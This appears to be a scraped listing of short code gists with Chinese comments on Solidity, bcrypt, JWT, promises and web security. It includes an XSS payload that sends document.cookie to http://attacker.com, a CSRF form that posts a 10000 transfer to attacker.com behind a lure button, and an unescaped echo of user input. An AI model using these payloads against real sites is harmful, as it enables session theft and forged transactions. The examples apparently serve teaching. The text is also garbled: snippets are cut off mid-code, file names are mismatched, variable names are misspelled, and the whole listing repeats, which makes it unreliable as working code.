Justin Chien cychien

## CreditExchange.sol
pragma solidity ^0.4.16;

/// @title credit exchange platform
contract CreditExchange {
    struct Case {
        bool isSuccessful;
        uint amount;
    }

    struct Person {

## bcrypt-sample.js
//安裝bcrypt
npm install bcrypt --save

//引入
const bcrypt = require('bcrypt');

//生成hash值
const myPlauntextPassword = 'qwerty';
const saltRound = 10;
bcrypt.hash(myPlaintextPassword, saltRounds, function(err, hash) {

## main.html
<form action='/handleForm' method='post'>
  <input type='text' name='words' />
  <input type='submit' value='Submit' />
</form>

## app.js
app.get('/handleForm', (req, res) => {
  res.send(req.body.words);
});

## getCookie.html
<script>
  const cookie = document.cookie;
  fetch(`http://attacker.com?cookie=${cookie}`, {method: 'get'})
    .then();
</script>

## xss.js
//安裝
npm install jsonwebtoken --save

//引入
const jwt = require("jsonwebtoken");

//產生jwt
const token = jwt.sign(
  {
  email: user.email,

## csrf.html
<form action='http://attacker.com' method='POST'>
  <input type='hidden' name='send' value='attacker'/>
  <input type='hidden' name='amount' value='10000'/>
  <input type="submit" value="你累了嗎？點我看看～"/>
</form>

## promise-simple-sample.js
const promise = new Promise((resolve, reject) => {
  //成功時執行
  resolve(value);
  //失敗時執行
  reject(value);
});

promise
  .then(value=>{
      //成功的話，做...

## promise-callback-unsafe.js
analytics.trackPurchase(purchaseData, ()=> {
  chargeCreditCard();
  displayThankyouPage();
});

## promise-callback-unsafe.js
analytics.trackPurchase(purchaseData, ()=> {
  chargeCreditCard();
  displayThankyouPage();
});
	pragma solidity ^0.4.16;

	/// @title credit exchange platform
	contract CreditExchange {
	struct Case {
	bool isSuccessful;
	uint amount;
	}

	struct Person {
	//安裝bcrypt
	npm install bcrypt --save

	//引入
	const bcrypt = require('bcrypt');

	//生成hash值
	const myPlauntextPassword = 'qwerty';
	const saltRound = 10;
	bcrypt.hash(myPlaintextPassword, saltRounds, function(err, hash) {
	<form action='/handleForm' method='post'>
	<input type='text' name='words' />
	<input type='submit' value='Submit' />
	</form>
	app.get('/handleForm', (req, res) => {
	res.send(req.body.words);
	});
	<script>
	const cookie = document.cookie;
	fetch(`http://attacker.com?cookie=${cookie}`, {method: 'get'})
	.then();
	</script>
	//安裝
	npm install jsonwebtoken --save

	//引入
	const jwt = require("jsonwebtoken");

	//產生jwt
	const token = jwt.sign(
	{
	email: user.email,
	<form action='http://attacker.com' method='POST'>
	<input type='hidden' name='send' value='attacker'/>
	<input type='hidden' name='amount' value='10000'/>
	<input type="submit" value="你累了嗎？點我看看～"/>
	</form>
	const promise = new Promise((resolve, reject) => {
	//成功時執行
	resolve(value);
	//失敗時執行
	reject(value);
	});

	promise
	.then(value=>{
	//成功的話，做...
	analytics.trackPurchase(purchaseData, ()=> {
	chargeCreditCard();
	displayThankyouPage();
	});